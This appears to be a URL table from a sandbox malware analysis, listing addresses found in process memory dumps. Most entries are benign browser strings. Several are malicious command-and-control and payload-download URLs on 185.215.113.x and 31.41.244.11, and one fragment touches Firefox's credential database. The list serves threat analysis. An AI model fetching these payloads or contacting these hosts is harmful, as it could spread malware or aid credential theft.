http://anglebug.com/4633	chrome.exe, 00000022.00000003.2878022781.00006DEC00530000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2872288444.00006DEC003E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2877891859.00006DEC003E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.3010997666.00006DEC00AD0000.00000004.00000800.00020000.00000000.sdmp	false		high
https://anglebug.com/7382	chrome.exe, 00000022.00000003.2878022781.00006DEC00530000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2872288444.00006DEC003E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2877891859.00006DEC003E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.3010997666.00006DEC00AD0000.00000004.00000800.00020000.00000000.sdmp	false		high
https://merino.services.mozilla.com/api/v1/suggest	firefox.exe, 00000021.00000002.2898025949.0000013966286000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000031.00000002.3317267748.0000024F701E2000.00000004.00001000.00020000.00000000.sdmp, firefox.exe, 00000031.00000002.3127317780.0000024F644DA000.00000004.00001000.00020000.00000000.sdmp	false		high
http://185.215.113.206/ws	aedbd2e320.exe, 00000020.00000002.2919990948.0000000001B05000.00000004.00000020.00020000.00000000.sdmp	false		high
https://docs.google.com/	chrome.exe, 00000022.00000003.2871824121.00006DEC00498000.00000004.00000800.00020000.00000000.sdmp	false		high
https://versioncheck-bg.addons.mozilla.org/update/VersionCheck.php?reqVersion=%REQ_VERSION%&id=%ITEM	firefox.exe, 0000001F.00000002.2899322458.0000023BA0660000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2897476513.0000013966070000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000031.00000002.3362368758.0000024F72080000.00000002.10000000.00040000.00000000.sdmp	false		high
http://185.215.113.206C	file.exe, 00000000.00000002.2129788119.000000000074E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.amazon.com/exec/obidos/external-search/	firefox.exe, 0000001E.00000003.2786740270.0000019DE583C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.2787450056.0000019DE5877000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.2785045981.0000019DE7B00000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.2786290787.0000019DE581F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.2787260190.0000019DE585A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000031.00000002.3317267748.0000024F7016F000.00000004.00001000.00020000.00000000.sdmp	false		high
http://anglebug.com/6929	chrome.exe, 00000022.00000003.2878022781.00006DEC00530000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2872288444.00006DEC003E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2877891859.00006DEC003E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.3010997666.00006DEC00AD0000.00000004.00000800.00020000.00000000.sdmp	false		high
https://github.com/mozilla-services/screenshots	firefox.exe, 0000001E.00000003.2786740270.0000019DE583C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.2787450056.0000019DE5877000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.2785045981.0000019DE7B00000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.2786290787.0000019DE581F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.2787260190.0000019DE585A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000031.00000002.3317267748.0000024F7016F000.00000004.00001000.00020000.00000000.sdmp	false		high
http://185.215.113.206A	aedbd2e320.exe, 00000020.00000002.2919990948.0000000001AAB000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://tracking-protection-issues.herokuapp.com/new	firefox.exe, 0000001F.00000002.2899322458.0000023BA0660000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2897476513.0000013966070000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000031.00000002.3362368758.0000024F72080000.00000002.10000000.00040000.00000000.sdmp	false		high
https://anglebug.com/7246	chrome.exe, 00000022.00000003.2878022781.00006DEC00530000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2872288444.00006DEC003E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2877891859.00006DEC003E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.3010997666.00006DEC00AD0000.00000004.00000800.00020000.00000000.sdmp	false		high
https://property-imper.sbs:443/api	0718eb7837.exe, 00000010.00000002.3094604903.0000000001641000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://anglebug.com/7369	chrome.exe, 00000022.00000003.2878022781.00006DEC00530000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2872288444.00006DEC003E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2877891859.00006DEC003E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.3010997666.00006DEC00AD0000.00000004.00000800.00020000.00000000.sdmp	false		high
https://anglebug.com/7489	chrome.exe, 00000022.00000003.2878022781.00006DEC00530000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2872288444.00006DEC003E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2877891859.00006DEC003E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.3010997666.00006DEC00AD0000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/fingerprinters-report	firefox.exe, 0000001F.00000002.2899322458.0000023BA0660000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2897476513.0000013966070000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000031.00000002.3362368758.0000024F72080000.00000002.10000000.00040000.00000000.sdmp	false		high
https://drive-daily-2.corp.google.com/	chrome.exe, 00000022.00000003.2871824121.00006DEC00498000.00000004.00000800.00020000.00000000.sdmp	false		high
https://addons.mozilla.org/%LOCALE%/%APP%/blocked-addon/%addonID%/%addonVersion%/	firefox.exe, 0000001F.00000002.2899322458.0000023BA0660000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2897476513.0000013966070000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000031.00000002.3362368758.0000024F72080000.00000002.10000000.00040000.00000000.sdmp	false		high
https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta	file.exe, 00000000.00000002.2129788119.00000000007C4000.00000004.00000020.00020000.00000000.sdmp, 0718eb7837.exe, 00000010.00000003.2943434775.00000000016EE000.00000004.00000020.00020000.00000000.sdmp, 0718eb7837.exe, 00000010.00000003.2940508064.00000000016E7000.00000004.00000020.00020000.00000000.sdmp, 0718eb7837.exe, 00000010.00000003.2943608468.00000000016F4000.00000004.00000020.00020000.00000000.sdmp, 0718eb7837.exe, 00000010.00000003.2940443306.00000000016D4000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2899808146.0000023BA08CB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.2898025949.00000139662C7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000031.00000002.3219423651.0000024F6FBAC000.00000004.00001000.00020000.00000000.sdmp	false		high
https://issuetracker.google.com/161903006	chrome.exe, 00000022.00000003.2872288444.00006DEC003E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.3013036669.00006DEC00B98000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2877891859.00006DEC003E4000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.ecosia.org/newtab/	file.exe, 00000000.00000003.1903881108.000000000081E000.00000004.00000020.00020000.00000000.sdmp, 0718eb7837.exe, 0000000E.00000003.2659262617.0000000005EDF000.00000004.00000800.00020000.00000000.sdmp, 0718eb7837.exe, 0000000E.00000003.2658810140.0000000005EE2000.00000004.00000800.00020000.00000000.sdmp, 0718eb7837.exe, 0000000E.00000003.2659096491.0000000005EDF000.00000004.00000800.00020000.00000000.sdmp, 0718eb7837.exe, 00000010.00000003.2810661969.0000000005E6F000.00000004.00000800.00020000.00000000.sdmp, 0718eb7837.exe, 00000010.00000003.2813113663.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.3006184749.00006DEC00840000.00000004.00000800.00020000.00000000.sdmp	false		high
https://drive-daily-5.corp.google.com/	chrome.exe, 00000022.00000002.2997133327.00006DEC00328000.00000004.00000800.00020000.00000000.sdmp	false		high
https://mitmdetection.services.mozilla.com/	firefox.exe, 0000001F.00000002.2899322458.0000023BA0660000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2897476513.0000013966070000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000031.00000002.3362368758.0000024F72080000.00000002.10000000.00040000.00000000.sdmp	false		high
http://185.215.113.206/ta	aedbd2e320.exe, 0000000F.00000002.2743981437.0000000001698000.00000004.00000020.00020000.00000000.sdmp	false		high
http://anglebug.com/4722	chrome.exe, 00000022.00000003.2878022781.00006DEC00530000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2872288444.00006DEC003E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2877891859.00006DEC003E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.3010997666.00006DEC00AD0000.00000004.00000800.00020000.00000000.sdmp	false		high
http://185.215.113.16/off/random.exe9	skotes.exe, 0000000B.00000002.3095371206.000000000151D000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://property-imper.sbs/apiatePr	0718eb7837.exe, 0000000E.00000003.2718722019.000000000150C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://185.215.113.16/off/def.exe	0718eb7837.exe, 00000010.00000002.3097894570.00000000016B9000.00000004.00000020.00020000.00000000.sdmp, 0718eb7837.exe, 00000010.00000002.3100558424.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, 0718eb7837.exe, 00000010.00000002.3094604903.0000000001653000.00000004.00000020.00020000.00000000.sdmp	false		high
https://services.addons.mozilla.org/api/v4/abuse/report/addon/	firefox.exe, 0000001F.00000002.2899322458.0000023BA0660000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2897476513.0000013966070000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000031.00000002.3362368758.0000024F72080000.00000002.10000000.00040000.00000000.sdmp	false		high
https://services.addons.mozilla.org/api/v4/addons/search/?guid=%IDS%&lang=%LOCALE%	firefox.exe, 0000001F.00000002.2899322458.0000023BA0660000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2897476513.0000013966070000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000031.00000002.3362368758.0000024F72080000.00000002.10000000.00040000.00000000.sdmp	false		high
https://color.firefox.com/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_content=theme-f	firefox.exe, 0000001F.00000002.2899322458.0000023BA0660000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2897476513.0000013966070000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000031.00000002.3362368758.0000024F72080000.00000002.10000000.00040000.00000000.sdmp	false		high
http://html4/loose.dtd	fa55e7c5ed.exe, 0000000D.00000003.2504178943.0000000007B32000.00000004.00001000.00020000.00000000.sdmp	false		high
https://monitor.firefox.com/user/breach-stats?includeResolved=true	firefox.exe, 0000001F.00000002.2899322458.0000023BA0660000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2897476513.0000013966070000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000031.00000002.3362368758.0000024F72080000.00000002.10000000.00040000.00000000.sdmp	false		high
https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/cross-site-tracking-report	firefox.exe, 0000001F.00000002.2899322458.0000023BA0660000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2897476513.0000013966070000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000031.00000002.3362368758.0000024F72080000.00000002.10000000.00040000.00000000.sdmp	false		high
http://anglebug.com/3502	chrome.exe, 00000022.00000003.2878022781.00006DEC00530000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2872288444.00006DEC003E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2877891859.00006DEC003E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.3010997666.00006DEC00AD0000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/3623	chrome.exe, 00000022.00000003.2872288444.00006DEC003E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.3013036669.00006DEC00B98000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2877891859.00006DEC003E4000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/3625	chrome.exe, 00000022.00000003.2872288444.00006DEC003E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.3013036669.00006DEC00B98000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2877891859.00006DEC003E4000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/3624	chrome.exe, 00000022.00000003.2872288444.00006DEC003E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.3013036669.00006DEC00B98000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2877891859.00006DEC003E4000.00000004.00000800.00020000.00000000.sdmp	false		high
https://property-imper.sbs:443/apin	0718eb7837.exe, 00000010.00000002.3094604903.0000000001641000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://anglebug.com/3862	chrome.exe, 00000022.00000003.2878022781.00006DEC00530000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2872288444.00006DEC003E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2877891859.00006DEC003E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.3010997666.00006DEC00AD0000.00000004.00000800.00020000.00000000.sdmp	false		high
https://chrome.google.com/webstoreLDDiscover	chrome.exe, 00000022.00000002.3007057295.00006DEC008D4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.2997133327.00006DEC00328000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2883243681.00006DEC00EF4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.2995804645.00006DEC002E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2878914967.00006DEC00CAC000.00000004.00000800.00020000.00000000.sdmp	false		high
http://185.215.113.206/c4becf79229cb002.phpi	file.exe, 00000000.00000002.2129788119.00000000007A8000.00000004.00000020.00020000.00000000.sdmp	false		high
http://anglebug.com/4836	chrome.exe, 00000022.00000003.2878022781.00006DEC00530000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2872288444.00006DEC003E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2877891859.00006DEC003E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.3010997666.00006DEC00AD0000.00000004.00000800.00020000.00000000.sdmp	false		high
https://issuetracker.google.com/issues/166475273	chrome.exe, 00000022.00000003.2872288444.00006DEC003E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2877891859.00006DEC003E4000.00000004.00000800.00020000.00000000.sdmp	false		high
http://185.215.113.206/c4becf79229cb002.phpq	file.exe, 00000000.00000002.2129788119.00000000007A8000.00000004.00000020.00020000.00000000.sdmp	false		high
https://monitor.firefox.com/about	firefox.exe, 0000001F.00000002.2899322458.0000023BA0660000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2897476513.0000013966070000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000031.00000002.3362368758.0000024F72080000.00000002.10000000.00040000.00000000.sdmp	false		high
https://property-imper.sbs/l	0718eb7837.exe, 0000000E.00000003.2746725809.00000000014F8000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://185.215.113.206/c4becf79229cb002.phpR%	aedbd2e320.exe, 0000000F.00000002.2743981437.000000000163E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://185.215.113.206/c4becf79229cb002.phpz	aedbd2e320.exe, 0000000F.00000002.2743981437.00000000016A1000.00000004.00000020.00020000.00000000.sdmp	false		high
http://185.215.113.206ones	file.exe, 00000000.00000002.2130376795.0000000000CC5000.00000040.00000001.01000000.00000003.sdmp	false	Avira URL Cloud: safe	unknown
http://x1.c.lencr.org/0	0718eb7837.exe, 0000000E.00000003.2719152486.0000000005ECE000.00000004.00000800.00020000.00000000.sdmp, 0718eb7837.exe, 00000010.00000003.2892612430.0000000005E62000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000031.00000002.3352541260.0000024F7103C000.00000004.00001000.00020000.00000000.sdmp	false		high
http://x1.i.lencr.org/0	0718eb7837.exe, 0000000E.00000003.2719152486.0000000005ECE000.00000004.00000800.00020000.00000000.sdmp, 0718eb7837.exe, 00000010.00000003.2892612430.0000000005E62000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000031.00000002.3352541260.0000024F7103C000.00000004.00001000.00020000.00000000.sdmp	false		high
http://anglebug.com/3970	chrome.exe, 00000022.00000003.2878022781.00006DEC00530000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2872288444.00006DEC003E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2877891859.00006DEC003E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.3010997666.00006DEC00AD0000.00000004.00000800.00020000.00000000.sdmp	false		high
http://185.215.113.206/RRC:	aedbd2e320.exe, 0000000F.00000002.2743981437.000000000163E000.00000004.00000020.00020000.00000000.sdmp	false		high
http://185.215.113.43/Zu7JuNko/index.php8254001	skotes.exe, 0000000B.00000002.3095371206.000000000150B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://support.mozilla.org/products/firefoxgro.all	0718eb7837.exe, 00000010.00000003.2898670007.0000000005F63000.00000004.00000800.00020000.00000000.sdmp	false		high
http://.jpg	fa55e7c5ed.exe, 0000000D.00000003.2504178943.0000000007B32000.00000004.00001000.00020000.00000000.sdmp	false		high
https://google-ohttp-relay-query.fastly-edge.com/2P	chrome.exe, 00000022.00000002.2913205632.000027A00080C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2854101451.000027A00039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2853190823.000027A000390000.00000004.00000800.00020000.00000000.sdmp	false		high
https://mail.yahoo.co.jp/compose/?To=%s	firefox.exe, 0000001E.00000003.2788970863.0000019DE7933000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.2791840293.0000019DE7930000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.2792089306.0000019DE7930000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000031.00000002.3365411007.0000024F7375F000.00000004.00001000.00020000.00000000.sdmp, firefox.exe, 00000031.00000002.3317267748.0000024F7016F000.00000004.00001000.00020000.00000000.sdmp, firefox.exe, 00000031.00000002.3334863235.0000024F70703000.00000004.00001000.00020000.00000000.sdmp	false		high
http://185.215.113.16:80/off/def.exeault-release/key4.dbPK	0718eb7837.exe, 00000010.00000002.3094604903.0000000001641000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://contile.services.mozilla.com/v1/tiles	firefox.exe, 0000001F.00000002.2899322458.0000023BA0660000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2897476513.0000013966070000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000031.00000002.3362368758.0000024F72080000.00000002.10000000.00040000.00000000.sdmp	false		high
http://anglebug.com/5901	chrome.exe, 00000022.00000003.2878022781.00006DEC00530000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2872288444.00006DEC003E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2877891859.00006DEC003E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.3010997666.00006DEC00AD0000.00000004.00000800.00020000.00000000.sdmp	false		high
https://monitor.firefox.com/user/preferences	firefox.exe, 0000001F.00000002.2899322458.0000023BA0660000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2897476513.0000013966070000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000031.00000002.3362368758.0000024F72080000.00000002.10000000.00040000.00000000.sdmp	false		high
https://screenshots.firefox.com/	firefox.exe, 0000001E.00000003.2787260190.0000019DE585A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000031.00000002.3317267748.0000024F7016F000.00000004.00001000.00020000.00000000.sdmp, firefox.exe, 00000031.00000002.3378129656.0000024F74BB2000.00000004.00001000.00020000.00000000.sdmp	false		high
http://anglebug.com/3965	chrome.exe, 00000022.00000003.2878022781.00006DEC00530000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2872288444.00006DEC003E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2877891859.00006DEC003E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.3010997666.00006DEC00AD0000.00000004.00000800.00020000.00000000.sdmp	false		high
https://anglebug.com/7161	chrome.exe, 00000022.00000003.2878022781.00006DEC00530000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2872288444.00006DEC003E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2877891859.00006DEC003E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.3010997666.00006DEC00AD0000.00000004.00000800.00020000.00000000.sdmp	false		high
http://185.215.113.206/c4becf79229cb002.phpN_)	aedbd2e320.exe, 00000020.00000002.2919990948.0000000001AAB000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://anglebug.com/7162	chrome.exe, 00000022.00000003.2878022781.00006DEC00530000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2872288444.00006DEC003E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2877891859.00006DEC003E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.3010997666.00006DEC00AD0000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/tracking-content-report	firefox.exe, 0000001F.00000002.2899322458.0000023BA0660000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2897476513.0000013966070000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000031.00000002.3362368758.0000024F72080000.00000002.10000000.00040000.00000000.sdmp	false		high
http://anglebug.com/5906	chrome.exe, 00000022.00000003.2878022781.00006DEC00530000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2872288444.00006DEC003E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2877891859.00006DEC003E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.3010997666.00006DEC00AD0000.00000004.00000800.00020000.00000000.sdmp	false		high
https://property-imper.sbs/4	0718eb7837.exe, 0000000E.00000003.2694483547.00000000014F8000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://anglebug.com/2517	chrome.exe, 00000022.00000003.2878022781.00006DEC00530000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2872288444.00006DEC003E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2877891859.00006DEC003E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.3010997666.00006DEC00AD0000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/4937	chrome.exe, 00000022.00000003.2878022781.00006DEC00530000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2872288444.00006DEC003E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2877891859.00006DEC003E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.3010997666.00006DEC00AD0000.00000004.00000800.00020000.00000000.sdmp	false		high
https://issuetracker.google.com/166809097	chrome.exe, 00000022.00000003.2872288444.00006DEC003E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.3013036669.00006DEC00B98000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2877891859.00006DEC003E4000.00000004.00000800.00020000.00000000.sdmp	false		high
http://31.41.244.11/files/rnd.exe	0718eb7837.exe, 00000010.00000002.3097894570.00000000016B9000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://lens.google.com/v3/upload	chrome.exe, 00000022.00000003.2858643495.000027A0006E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.2912413617.000027A000744000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.2912637888.000027A00078C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2859206602.000027A0006E8000.00000004.00000800.00020000.00000000.sdmp	false		high
http://185.215.113.206/c4becf79229cb002.php/K	aedbd2e320.exe, 00000020.00000002.2919990948.0000000001B05000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://anglebug.com/3832	chrome.exe, 00000022.00000003.2878022781.00006DEC00530000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2872288444.00006DEC003E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2877891859.00006DEC003E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.3010997666.00006DEC00AD0000.00000004.00000800.00020000.00000000.sdmp	false		high
https://property-imper.sbs:443/apiK	0718eb7837.exe, 00000010.00000002.3094604903.0000000001641000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://drive-daily-0.corp.google.com/	chrome.exe, 00000022.00000003.2871824121.00006DEC00498000.00000004.00000800.00020000.00000000.sdmp	false		high
https://webextensions.settings.services.mozilla.com/v1	firefox.exe, 0000001F.00000002.2899322458.0000023BA0660000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2897476513.0000013966070000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000031.00000002.3362368758.0000024F72080000.00000002.10000000.00040000.00000000.sdmp	false		high
https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/firefox-relay-integration	firefox.exe, 0000001F.00000002.2899322458.0000023BA0660000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2897476513.0000013966070000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000031.00000002.3362368758.0000024F72080000.00000002.10000000.00040000.00000000.sdmp	false		high
https://addons.mozilla.org/%LOCALE%/firefox/	firefox.exe, 0000001F.00000002.2899322458.0000023BA0660000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2897476513.0000013966070000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000031.00000002.3362368758.0000024F72080000.00000002.10000000.00040000.00000000.sdmp	false		high
http://anglebug.com/6651	chrome.exe, 00000022.00000003.2878022781.00006DEC00530000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2872288444.00006DEC003E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2877891859.00006DEC003E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.3010997666.00006DEC00AD0000.00000004.00000800.00020000.00000000.sdmp	false		high
https://anglebug.com/4830	chrome.exe, 00000022.00000003.2878022781.00006DEC00530000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2872288444.00006DEC003E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2877891859.00006DEC003E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.3010997666.00006DEC00AD0000.00000004.00000800.00020000.00000000.sdmp	false		high
https://developers.google.com/safe-browsing/v4/advisory	firefox.exe, 0000001F.00000002.2899322458.0000023BA0660000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2897476513.0000013966070000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000031.00000002.3362368758.0000024F72080000.00000002.10000000.00040000.00000000.sdmp	false		high
